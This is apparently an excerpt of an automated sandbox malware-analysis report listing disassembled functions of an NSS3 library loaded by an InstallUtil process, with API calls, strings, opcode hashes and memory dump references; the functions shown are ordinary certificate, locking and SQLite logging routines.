                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1351604052-0
                                                                                                                  • Opcode ID: 96c209f8c611172443e116b8a5d125eed4e0aa852cf0a903215121dab49a084c
                                                                                                                  • Instruction ID: 79ac7758a761a214748dd48876e1db78ebe6d45a4e2d67c742d06a9339687011
                                                                                                                  • Opcode Fuzzy Hash: 96c209f8c611172443e116b8a5d125eed4e0aa852cf0a903215121dab49a084c
                                                                                                                  • Instruction Fuzzy Hash: A2C1BEB1A002199BDB20CF28DD85BDAB7B5BF48308F1441A8E94DA7741E771EE95CF90
                                                                                                                  Function 6C752C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ZAlloc_Util.NSS3(F0F7DD0C), ref: 6C752C5D
                                                                                                                    • Part of subcall function 6C7B0D30: calloc.MOZGLUE ref: 6C7B0D50
                                                                                                                    • Part of subcall function 6C7B0D30: TlsGetValue.KERNEL32 ref: 6C7B0D6D
                                                                                                                  • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C752C8D
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C752CE0
                                                                                                                    • Part of subcall function 6C752E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C752CDA,?,00000000), ref: 6C752E1E
                                                                                                                    • Part of subcall function 6C752E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C752E33
                                                                                                                    • Part of subcall function 6C752E00: TlsGetValue.KERNEL32 ref: 6C752E4E
                                                                                                                    • Part of subcall function 6C752E00: EnterCriticalSection.KERNEL32(?), ref: 6C752E5E
                                                                                                                    • Part of subcall function 6C752E00: PL_HashTableLookup.NSS3(?), ref: 6C752E71
                                                                                                                    • Part of subcall function 6C752E00: PL_HashTableRemove.NSS3(?), ref: 6C752E84
                                                                                                                    • Part of subcall function 6C752E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C752E96
                                                                                                                    • Part of subcall function 6C752E00: PR_Unlock.NSS3 ref: 6C752EA9
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C752D23
                                                                                                                  • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C752D30
                                                                                                                  • CERT_MakeCANickname.NSS3(00000001), ref: 6C752D3F
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C752D73
                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C752DB8
                                                                                                                  • free.MOZGLUE ref: 6C752DC8
                                                                                                                    • Part of subcall function 6C753E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C753EC2
                                                                                                                    • Part of subcall function 6C753E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C753ED6
                                                                                                                    • Part of subcall function 6C753E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C753EEE
                                                                                                                    • Part of subcall function 6C753E60: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C753F02
                                                                                                                    • Part of subcall function 6C753E60: PL_FreeArenaPool.NSS3 ref: 6C753F14
                                                                                                                    • Part of subcall function 6C753E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C753F27
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3941837925-0
                                                                                                                  • Opcode ID: 8e0500102917ec4059a1a0c74b7b00556f6c92c8d49199817d64b9d65058c5e3
                                                                                                                  • Instruction ID: e45e1e96be7dc9a595dab6f6cb7a840c774ed58868ffc27c55f419aaa4180a5b
                                                                                                                  • Opcode Fuzzy Hash: 8e0500102917ec4059a1a0c74b7b00556f6c92c8d49199817d64b9d65058c5e3
                                                                                                                  • Instruction Fuzzy Hash: B751FF72A043119BEB109E68DE8AB6B77E5EF84308F54043CE84583651EF31E825CB92
                                                                                                                  Function 6C778F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FAF
                                                                                                                  • PR_Now.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FD1
                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FFA
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779013
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779042
                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C77905A
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779073
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7790EC
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779111
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2831689957-0
                                                                                                                  • Opcode ID: 078b317a0f75ea997eed47680b7966acb58713853027c86e0ece50feb910bd34
                                                                                                                  • Instruction ID: 94306ed6a34a9e98f15345cbb3324d3d1d28c8805fa322f0914559212b9db288
                                                                                                                  • Opcode Fuzzy Hash: 078b317a0f75ea997eed47680b7966acb58713853027c86e0ece50feb910bd34
                                                                                                                  • Instruction Fuzzy Hash: 41518970A056098FCF20EF78C688299BBF0BF5A318F055579DC449B716EB35E885CBA1
                                                                                                                  Function 6C6EE890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C6EE922
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6EE9CF
                                                                                                                  • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6EEA0F
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EEB20
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C6EEB57
                                                                                                                  Strings
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C6EEDC2
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 6C6EEE04
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 6C6EED18
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpystrlen$memset
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  • API String ID: 638109778-272990098
                                                                                                                  • Opcode ID: fe641ea0e9107568ddc4acd860fcffceb3d8dad4f3ca820d2b92e7591d01fb19
                                                                                                                  • Instruction ID: c76c7992b5dea2c4b2b736e2cdf7a4388c9f035476a0a201b8e465a16fca33f8
                                                                                                                  • Opcode Fuzzy Hash: fe641ea0e9107568ddc4acd860fcffceb3d8dad4f3ca820d2b92e7591d01fb19
                                                                                                                  • Instruction Fuzzy Hash: E502AE71E0A519CFDB04CF99C580AEEB7F2BF8D308F29416AD815AB751D731A841CBA4
                                                                                                                  Function 6C822F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C822FFD
                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C823007
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C823032
                                                                                                                  • sqlite3_mprintf.NSS3(6C88AAF9,?), ref: 6C823073
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C8230B3
                                                                                                                  • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C8230C0
                                                                                                                  Strings
                                                                                                                  • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C8230BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                  • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                  • API String ID: 750880481-4279182443
                                                                                                                  • Opcode ID: bd173cf11c630932353782eb4479d59123f2d72b77537146961037fd38f44681
                                                                                                                  • Instruction ID: ef4af09bdbda696273c10a4f4f2e54cc399fcd5f80eb50e6f8fdd13cd27988bc
                                                                                                                  • Opcode Fuzzy Hash: bd173cf11c630932353782eb4479d59123f2d72b77537146961037fd38f44681
                                                                                                                  • Instruction Fuzzy Hash: B041C271600606AFDB20CF25D958A86B7A9FF44368F148A28EC1987B40E735F995CBE0
                                                                                                                  Function 6C76E400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E432
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E44F
                                                                                                                    • Part of subcall function 6C772C40: TlsGetValue.KERNEL32(#?wl,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C62
                                                                                                                    • Part of subcall function 6C772C40: EnterCriticalSection.KERNEL32(0000001C,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C76
                                                                                                                    • Part of subcall function 6C772C40: PL_HashTableLookup.NSS3(00000000,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C86
                                                                                                                    • Part of subcall function 6C772C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C76E477,?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C772C93
                                                                                                                  • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E494
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E4AD
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E4D6
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C773F23,?), ref: 6C76E52F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                  • String ID: #?wl
                                                                                                                  • API String ID: 3106257965-2559491875
                                                                                                                  • Opcode ID: 7a17d5bb42eeab36e5e5fe5ef19312e3343824632f4da9cdd01bf3b53988f9c4
                                                                                                                  • Instruction ID: 0e5224b72d9ba3e85d634ce74226e682b940b8e65c4c1e1a1332475616ec5198
                                                                                                                  • Opcode Fuzzy Hash: 7a17d5bb42eeab36e5e5fe5ef19312e3343824632f4da9cdd01bf3b53988f9c4
                                                                                                                  • Instruction Fuzzy Hash: D6411CB4A05609CFCB10EF79DA8855ABBF0FF05304B054969DC949BB11E730E895CBE2
                                                                                                                  Function 6C768CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,?,6C77124D,00000001), ref: 6C768D19
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C77124D,00000001), ref: 6C768D32
                                                                                                                  • PL_ArenaRelease.NSS3(?,?,?,?,?,6C77124D,00000001), ref: 6C768D73
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C77124D,00000001), ref: 6C768D8C
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C77124D,00000001), ref: 6C768DBA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                  • String ID: KRAM$KRAM
                                                                                                                  • API String ID: 2419422920-169145855
                                                                                                                  • Opcode ID: 7c68ffc4a30854909a4907907604d42554067025961835bab158831840e546b2
                                                                                                                  • Instruction ID: e31f8ea7e0fd0329a02996fae57bdeb06548bd46137665ead4f1cf38aa12367f
                                                                                                                  • Opcode Fuzzy Hash: 7c68ffc4a30854909a4907907604d42554067025961835bab158831840e546b2
                                                                                                                  • Instruction Fuzzy Hash: F02182B16046018FCB00EF7AC68955AB7F0FF5A308F15897ADC9887B01D730D841CBA1
                                                                                                                  Function 6C860ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C860EE6
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C860EFA
                                                                                                                    • Part of subcall function 6C74AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C74AF0E
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F16
                                                                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F1C
                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F25
                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F2B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                  • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                  • API String ID: 2948422844-1374795319
                                                                                                                  • Opcode ID: fbb34b0f574845ba6c8e0a909dd3f96d55f2ebd6419bd86f4167672f51ef9823
                                                                                                                  • Instruction ID: af54f4d421aad8de8302f36dd5c6b9dbb3c5d3cd928281b78051f67d048b2bde
                                                                                                                  • Opcode Fuzzy Hash: fbb34b0f574845ba6c8e0a909dd3f96d55f2ebd6419bd86f4167672f51ef9823
                                                                                                                  • Instruction Fuzzy Hash: 7701A1B59001146BDF216FA9ED49C9F3F3DDF46268B004424FD0997A42D732E910C6E6
                                                                                                                  Function 6C824D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C824DC3
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C824DE0
                                                                                                                  Strings
                                                                                                                  • invalid, xrefs: 6C824DB8
                                                                                                                  • API call with %s database connection pointer, xrefs: 6C824DBD
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C824DCB
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C824DDA
                                                                                                                  • misuse, xrefs: 6C824DD5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                  • API String ID: 632333372-2974027950
                                                                                                                  • Opcode ID: e36ae63783e7bb7f762d9e5735cb99da46d8a20db12f348cc5e1cc05ec06a471
                                                                                                                  • Instruction ID: bc626eb95d508e870ec4c1a048b8b707b160fc28c0740fb6b53cfb7f60247353
                                                                                                                  • Opcode Fuzzy Hash: e36ae63783e7bb7f762d9e5735cb99da46d8a20db12f348cc5e1cc05ec06a471
                                                                                                                  • Instruction Fuzzy Hash: 07F0B421A155786FD7205115CF18F8637964F9132AF460DA1ED046BF92D249A8D083E1
                                                                                                                  Function 6C824DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C824E30
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C824E4D
                                                                                                                  Strings
                                                                                                                  • invalid, xrefs: 6C824E25
                                                                                                                  • API call with %s database connection pointer, xrefs: 6C824E2A
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C824E38
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C824E47
                                                                                                                  • misuse, xrefs: 6C824E42
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
